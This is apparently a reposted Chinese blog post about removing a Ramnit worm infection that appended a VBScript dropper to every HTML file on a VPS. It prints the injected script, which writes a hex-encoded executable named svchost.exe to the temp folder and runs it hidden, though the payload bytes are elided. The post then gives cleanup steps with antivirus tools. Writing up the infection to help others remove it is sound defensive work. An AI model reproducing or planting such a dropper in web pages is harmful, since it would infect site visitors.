HTML 感染 DropFileName = “svchost.exe” Ramnit 蠕虫病毒 查杀解决办法

参考：

https://www.cnblogs.com/wuhairui/p/8297614.html
http://www.guopingblog.com/post/100.html

 

最近发现vps流量疯长 看了下统计 也没看到网站有大流量，查看源码才发现网页被添加了一段很长的js 内容大概是这样

 

 <SCRIPT  Language=VBScript>

 DropFileName = “svchost.exe”

 WriteData =

 “4D5A0000200000000400000F00FFF.............................................此处省略N个字符串”

 Set FSO = CreateObject("Scripting.FileSystemObject")
 DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
 If FSO.FileExists(DropPath)=False Then
 Set FileObj = FSO.CreateTextFile(DropPath, True)
 For i = 1 To Len(WriteData) Step 2
 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
 Next
 FileObj.Close
 End If
 Set WSHshell = CreateObject("WScript.Shell")
 WSHshell.Run DropPath, 0
 //--></SCRIPT>

 

到vps一看才发现 全部的 html 文件末尾都被加了一段这个代码把页面体积搞的很大 从而致使流量飙升，百度了一夜没搞明白，次日又搞了一天试过360杀毒根本没啥用，最后用赛门铁克的  Ramnit 蠕虫病毒 专杀工具给搞定了。下面说下解决方案

 

一、下载    赛门铁克的  Ramnit 蠕虫病毒 专杀工具

下载地址：https://www.symantec.com/security_response/writeup.jsp?docid=2015-022415-4725-99

下载后直接运行 点 star 便可 全盘删完后会提示重启 点 yes 重启便可。

 

二、用专杀工具杀完之后随机检查了几个 html 文件发现还有那段代码，不过不会像以前本身手动删了 而后里面就又被自动加上了，这说明病毒已经被杀掉了多是文件太多，专杀工具没有全都检测获得，不过不要紧能够用批量查找替换工具 ultrareplace 把网站从新查找替换一下便可。

 

ultrareplace 下载地址：http://www.xiazaiba.com/html/4475.html

 

目前看上去是问题解决了，还需再观察几天，尽可能不要在服务器下载运行来历不明的软件，及时打补丁安装防御工具。

 

 

---

 

 

首先表示强烈谴责，没事写出这种木马来。致使开发者把时间花在解决这种问题上。

这种木马会在你全盘的html文件的最底部生成一堆vbscript代码，致使html文件变得很大。大概213kb。能够看出他就是在恶搞。

如图：

你写好的html，过段时间就变成这样了。前端开发表示简直心态爆炸。

 

解决方案：

 

1.至如下连接处下载ATTK扫描工具： http://support.trendmicro.com.cn ... stomizedpackage.exe (32位） http://support.trendmicro.com.cn ... mizedpackage_64.exe（64位） 2.将下载的工具(supportcustomizedpackage)放到有问题的电脑上，双击运行 3.在打开的界面中手动设定扫描全盘文件

运行：

全盘扫描：

 

 

转：https://bbs.kafan.cn/thread-1830286-1-1.html